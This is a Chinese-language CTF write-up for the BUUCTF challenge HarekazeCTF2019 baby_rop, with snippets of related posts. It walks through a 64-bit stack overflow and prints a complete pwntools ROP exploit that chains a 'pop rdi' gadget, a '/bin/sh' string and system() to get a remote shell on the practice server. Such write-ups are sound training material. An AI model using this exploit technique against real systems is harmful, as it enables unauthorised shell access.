[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
附件
步骤:
例行检查,64位,开启了NX保护
试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错
64位ida载入,shift+f12查看程序里的字符串,看到了system 和 ‘/bin/sh’
双击跟进,ctrl+x查看一下哪里调用了字符串,没有找到函数,只找到了地址
shell=0x601048
system=0x400496
找到输入点,没有限制v4读入的数据,可以造成溢出,跟pwn16差不多,唯一的区别就是64位程序传参需要用到寄存器,我们找一下设置rdi寄存器的位置
ROPgadget --binary babyrop |grep "pop rdi"
rdi=0x400683
EXP:
from pwn import*r=remote('node3.buuoj.cn',25853)shell=0x601048
system=0x400496
rdi=0x400683payload='a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)r.sendline(payload)
r.interactive()
flag不在根目录下,需要我们找一下,利用find -name flag找一下
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop相关推荐
- BUUCTF(pwn)[HarekazeCTF2019]baby_rop
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中 from pwn import* p = remote("node3.buuoj.cn",28711) ...
- [BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
[BUUCTF-pwn]--[HarekazeCTF2019]baby_rop 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop 先 ...
- [BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没 ...
- BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget
64位,开了nx保护 运行了一下程序 buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为" system('/bin/sh') 利用read函数 ...
- 分析自动化测试收益_分析自动化测试结果
分析自动化测试收益 So, you've set up a sweet automated test framework. You're running it in your CI/CD pipeli ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...
- buuctf(pwn)
胖胖 pwn1_sctf_2016 ciscn_2019_n_11 补充movss /ucomiss jarvisoj_level0 ciscn_2019_c_1 babyrop [第五空间2019 ...
- PWN-PRACTICE-BUUCTF-5
PWN-PRACTICE-BUUCTF-5 jarvisoj_level2_x64 ciscn_2019_n_5 others_shellcode ciscn_2019_ne_5 jarvisoj_l ...
最新文章
- A*寻路算法所生成的路径
- npm ERR! code EINTEGRITY npm ERR! sha1- 报错解决办法
- 人工智能秘史(四):憧憬人机共生的“DARPA梦想家”
- 16进制、10进制(n进制)转换为二进制
- Android的ListView长按监听器
- VC6保姆级图文教程
- AVOD-代码理解系列(三)
- Python函数练习题
- Matlab 绘制柱状图并标注对应数字值
- 数学通道的应用(十四)-负PWM控制下有效值的计算
- JAVA小乌龟游泳_描写乌龟游泳的作文
- 手机app支付宝支付和苹果支付分析
- python 模拟百度搜索关键词
- 十大流行开源软件推荐
- win10电脑如何取得管理员权限
- PUM-main makefile报错 #2
- Python Turtle 海龟绘图详解官方文档中文版
- 指纹锁的识别与原理及安全性
- 如何将 Credly 中的数字徽章转成二维码
- (转贴) 《超越自己》
热门文章
- 电商项目商品详情页架构设计
- python课件百度文库_python教-教学课件.doc
- PYQT5(13)-基本窗口控件-拖曳与剪贴板
- 示例库 - 超过50个流程图 (Collection: Over 50 Flowchart Examples)
- 国内最全的android软件商店 应用市场 汇总
- python做值班表预测_Django model一张表中两个字段设置外键参考另一张表两个字段...
- python运算符和基本数据类型你了解吗?
- Alpha-Beta 剪枝
- Polar vector and axial vector(极矢量和轴向矢量)
- 蓝桥杯2022年第十三届决赛真题-修路